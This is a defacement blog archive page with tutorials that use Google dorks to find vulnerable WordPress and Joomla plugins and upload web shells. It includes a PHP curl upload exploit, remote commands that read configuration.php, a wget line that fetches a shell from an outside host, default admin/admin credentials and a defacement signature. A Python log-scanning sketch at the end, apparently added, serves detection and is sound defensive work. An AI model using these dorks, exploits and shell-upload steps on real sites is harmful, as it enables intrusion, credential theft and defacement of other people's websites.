Showing posts with the label Deface. Show all posts

[DEFACE] How To Deface with WordPress Reflex Gallery




Tutorial GhostBin : Click [ GHOSTBIN ]
Tutorial YouTube : Click [ Youtube ]

- DUR74N4

~ Friday, 3 April 2015 0 comments

[DEFACE] How To Deface with Formcraft



Ghostbin Tutorial : https://ghostbin.com/paste/rauxf
Youtube Tutorial : https://www.youtube.com/watch?v=JLQjcgSZ1dE

- Dork : "powered by formcraft" use ur brain for the new dork :D
- exploit : /wp-content/plugins/formcraft/file-upload/server/php/upload.php
- Access the shell / file : /wp-content/plugins/formcraft/file-upload/server/php/files/[randomcode]--nameshell.php

Happy Deface ^_^

~ Monday, 16 February 2015 0 comments

[JOOMLA] JomSocial 2.6 Remote Code Execution



Dork:
inurl:/index.php?option=com_community
Procedure:
   1- Copy the dork and paste it into Google or any other search engine
   2- Choose any site
   3- Run the JomSocial Exploiter by Gothie
   4- Paste the site URL in the given textbox and click Connect
   5- If the site is vulnerable, you will get the message as below

   6- Now you can execute any command remotely. The commands are as below:
system('id & uname -a');
system('ls');
system('cat configuration.php');
   7- To upload a shell, you need to have a raw shell (shell.txt) uploaded anywhere that can be accessed directly without executing it. Type the command below to import your shell and save it as .php
system('wget http://socialmediasuccesstools.com/shell.txt -O shell.php');
   8- Your shell can be found at http://victim.com/shell.php


Downloads
JomSocial Exploiter by Gothie (2.7MB) 

~ Wednesday, 29 October 2014 0 comments

XSS Vulnerability

Dork:
inurl:"/showcatrows.php?CategoryID="
Exploit:
">

HaCked By NEXUS

 
./ NEXUS 




~ Wednesday, 25 June 2014 0 comments

Exploit Elfinder - Shell Upload Vulnerability


Dork:
inurl:/elfinder/ intitle:index of
Steps:
1- Copy the dork and paste it into Google

2- Choose any site

3- Look for elfinder.html or elfinder.php.html

   

4- Upload your file





5- If your file is uploaded successfully, it will be in the same directory. Double-click on your file to see the result





That's all :)

~ Sunday, 22 June 2014 0 comments

Shop737 - File Upload Vulnerabilities



Finding Vulnerable Target

Dork: intext:"Powered by Shop737"

1- Copy and paste this dork into Google.

2- Choose any site as your target.

3- Once you have clicked on your target, you will see something like this,




Exploiting Target

1- To enable upload mode, you need to change the website URL slightly.

Change index.php to upload.php


Example :

http://asdijateng.org/poto/index.php?

to

http://asdijateng.org/poto/upload.php


Hit enter and you will get an admin login prompt,





2- Simply enter the username and password as below:

User Name : admin
Password : admin


3- After you click Log In, you will get something like this,



4- As you can see, there is "Buat kategori baru:"; fill in the field with any new category name you like :)

Below the text, there is "Keterangan kategori:"; leave it empty and just click the "Buat Kategori" button.





5- Or you can simply browse for your file and click upload.

6- If your file is uploaded successfully, it will be in the directory /poto/[category_name]/yourfile.txt

Example:
www.site.com/poto/kd.txt
www.site.com/poto/bcc/kd.txt

~ 0 comments

Exploit Joomla!: JCE


It has been a very long time since I posted here, so today I'm going to post a new tutorial on how to upload a shell with the JCE method.

Things Required:
JCE Exploiter : DOWNLOAD

DORKS:
 inurl:"images/stories" php
"index of /images/stories/powered_by.png"
"index of /images/stories/joomla-dev_cycle.png"
"index of /images/stories/food"
"index of /images/stories/fruit"
inurl:"/images/stories/food"
inurl:"/images/stories/fruit"
inurl:index.php?option=com_jce
inurl:index.php?option=com_virtuemart
inurl:joomla/index.php?option=com_virtuemart

Steps:
1- Copy any of the dorks and paste it into Google





2 - Choose any site

3 - Open up JCE.exe

4 - Paste the site that you chose in the textbox

5 - Click on START

6 - If the shell uploads successfully, you will get the link to the shell





7 - Go to the given url, and upload your shell

 
 Video



Video by Tentera Siber Legion


~ Thursday, 19 June 2014 0 comments

Exploit Wordpress:Complete Gallery Manager 3.3.3 - File Upload Vulnerability



Things Required:
-XAMPP
-Shell
-Exploit script.php

Dork: inurl/wp-content/plugins/complete-gallery-manager
Shell Uploaded to : http://wordpress.com/wp-content/2013/09/up.php

Exploit :


<?php
$uploadfile="up.php";
$ch = curl_init("http://wordpress.localhost:8080/wordpress/wp-content/plugins/complete-gallery-manager/frames/upload-images.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('qqfile'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";

?>
Just watch the video if you still don't understand :)

 

~ Thursday, 15 May 2014 0 comments

Exploit Wordpress: Salespresspro Theme - File Upload Vulnerability







POC:
Dork: inurl:/themes/salespresspro
          inurl:/wp-content/themes/salespresspro/

Exploit: /wp-content/themes/salespresspro/headerimgbgblog-upload.php  

This exploit is the same as the previous exploit that I posted; please check it if you can't understand.

  

~ 0 comments
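
For site owners, the Formcraft, Complete Gallery Manager and Salespresspro posts above all describe the same pattern: a POST to an unauthenticated upload script, followed by a request for a script file in a directory meant for media. The detection sketch below is an added example, not part of the original blog; it assumes combined-format access logs, and the STATIC_DIRS policy list and the sample log lines are constructed for illustration.

```python
import re
from collections import defaultdict

# Upload endpoints named in the posts on this page.
UPLOAD_ENDPOINTS = (
    "/wp-content/plugins/formcraft/file-upload/server/php/upload.php",
    "/wp-content/plugins/complete-gallery-manager/frames/upload-images.php",
    "/wp-content/themes/salespresspro/headerimgbgblog-upload.php",
)
# Directories that should only ever serve static files (assumed site policy).
STATIC_DIRS = (
    "/wp-content/plugins/formcraft/file-upload/server/php/files/",
    "/wp-content/uploads/",
    "/images/stories/",
)
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)
SCRIPT_RE = re.compile(r"\.ph(p\d?|tml)$")

SAMPLE_LOG = [  # constructed lines using documentation IP ranges
    '203.0.113.7 - - [16/Feb/2015:10:01:02 +0000] "POST /wp-content/plugins/formcraft/file-upload/server/php/upload.php HTTP/1.1" 200 120 "-" "curl/7.38"',
    '203.0.113.7 - - [16/Feb/2015:10:01:09 +0000] "GET /wp-content/plugins/formcraft/file-upload/server/php/files/ab12--x.php HTTP/1.1" 200 15 "-" "curl/7.38"',
    '198.51.100.4 - - [16/Feb/2015:10:02:00 +0000] "GET /wp-content/uploads/2015/02/photo.jpg HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [16/Feb/2015:10:03:00 +0000] "GET /images/stories/food/x.php HTTP/1.1" 404 0 "-" "Mozilla/5.0"',
]

def scan(lines):
    """Return (upload_posts, script_hits, correlated_ips) for an access log."""
    posts, scripts = defaultdict(list), defaultdict(list)
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined log format
        path = m["path"].split("?", 1)[0].lower()
        if m["method"] == "POST" and path.endswith(UPLOAD_ENDPOINTS):
            # endswith() also catches installs under a sub-directory
            posts[m["ip"]].append(path)
        elif (m["status"] == "200" and SCRIPT_RE.search(path)
              and any(d in path for d in STATIC_DIRS)):
            scripts[m["ip"]].append(path)  # script served from a media dir
    # Clients that both posted to an upload script and fetched a script file
    correlated = sorted(set(posts) & set(scripts))
    return dict(posts), dict(scripts), correlated

if __name__ == "__main__":
    print(scan(SAMPLE_LOG))
```

A hit in the correlated list warrants checking the named directory for unexpected files. Configuring the web server to refuse script execution in upload and media directories removes the second half of the pattern.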